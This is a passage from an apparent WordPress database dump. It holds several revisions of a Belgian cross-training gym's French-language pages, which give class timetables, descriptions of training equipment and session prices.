!\r\n<h2>_</h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2>_</h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2>_</h2>\r\n<h2>Coatching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>_</h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-04 16:23:57', '2013-07-04 16:23:57', '', 11, 'http://www.crosstrainingcenter.be/?p=280', 0, 'revision', '', 0),
(281, 1, '2013-07-04 16:27:23', '2013-07-04 16:27:23', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Les séances sont composées de différentes phases décrites selon le planning ci-dessous.\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2>_</h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2>_</h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2>_</h2>\r\n<h2>Coatching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>_</h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-04 16:27:23', '2013-07-04 16:27:23', '', 11, 'http://www.crosstrainingcenter.be/?p=281', 0, 'revision', '', 0),
(282, 1, '2013-07-04 16:28:48', '2013-07-04 16:28:48', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Les séances sont composées de différentes phases décrites selon le planning ci-dessous.\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2>&nbsp;</h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2>&nbsp;</h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2>&nbsp;</h2>\r\n<h2>Coatching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>_</h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-04 16:28:48', '2013-07-04 16:28:48', '', 11, 'http://www.crosstrainingcenter.be/?p=282', 0, 'revision', '', 0),
(285, 1, '2013-07-04 16:34:15', '2013-07-04 16:34:15', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Les séances sont composées de différentes phases décrites selon le planning ci-dessous.\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2></h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2></h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2></h2>\r\n<h2>Coatching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2></h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-04 16:34:15', '2013-07-04 16:34:15', '', 11, 'http://www.crosstrainingcenter.be/?p=285', 0, 'revision', '', 0),
(283, 1, '2013-07-03 20:45:06', '2013-07-03 20:45:06', '<blockquote>\r\n<h2>Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines.</h2>\r\n</blockquote>\r\nAfin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …).\r\n<h2></h2>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/trx1.jpg\"><img class=\"alignnone size-full wp-image-68\" alt=\"trx1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/trx1.jpg\" width=\"200\" height=\"200\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>TRX Suspension Training</h1>\r\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/kb.jpg\"><img class=\"alignnone size-full wp-image-70\" alt=\"kb\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/kb.jpg\" width=\"200\" height=\"200\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Kettlebel</h1>\r\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/vipr-f1.jpg\"><img class=\"alignnone size-full wp-image-72\" alt=\"vipr-f1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/vipr-f1.jpg\" width=\"200\" height=\"200\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>ViPR</h1>\r\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/ript.jpg\"><img class=\"alignnone size-full wp-image-75\" alt=\"ript\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/ript.jpg\" width=\"200\" height=\"200\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>RIP Trainer</h1>\r\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-07-03 20:45:06', '2013-07-03 20:45:06', '', 22, 'http://www.crosstrainingcenter.be/?p=283', 0, 'revision', '', 0),
(318, 1, '2013-07-04 19:38:20', '2013-07-04 19:38:20', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Une séance est composée de 4 phases décrite dans le planning ci-dessous.\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td 